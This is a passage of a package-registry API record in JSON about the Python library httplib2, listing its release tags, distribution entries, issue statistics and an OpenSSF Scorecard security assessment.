Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:06:45.575Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{},"purl":"pkg:nix/python312Packages.httplib2?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python312Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python312Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python312Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4856,"html_url":null,"role":null,"created_at":"2026-03-07T09:03:53.744Z","updated_at":"2026-03-07T09:03:53.744Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3204},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-08-25T05:01:17.178Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":13536718,"name":"python-httplib2","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-11T00:27:09.008Z","latest_release_published_at":"2026-02-11T00:27:09.008Z","latest_release_number":"0.20.4-3","last_synced_at":"2026-03-11T02:06:11.140Z","created_at":"2026-02-11T00:27:08.815Z","updated_at":"2026-08-22T19:48:21.228Z","registry_url":"https://launchpad.net/ubuntu/+source/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-httplib2","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-cryptography \u003c!nocheck\u003e, python3-pyparsing \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-timeout \u003c!nocheck\u003e, python3-six \u003c!nocheck\u003e, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","t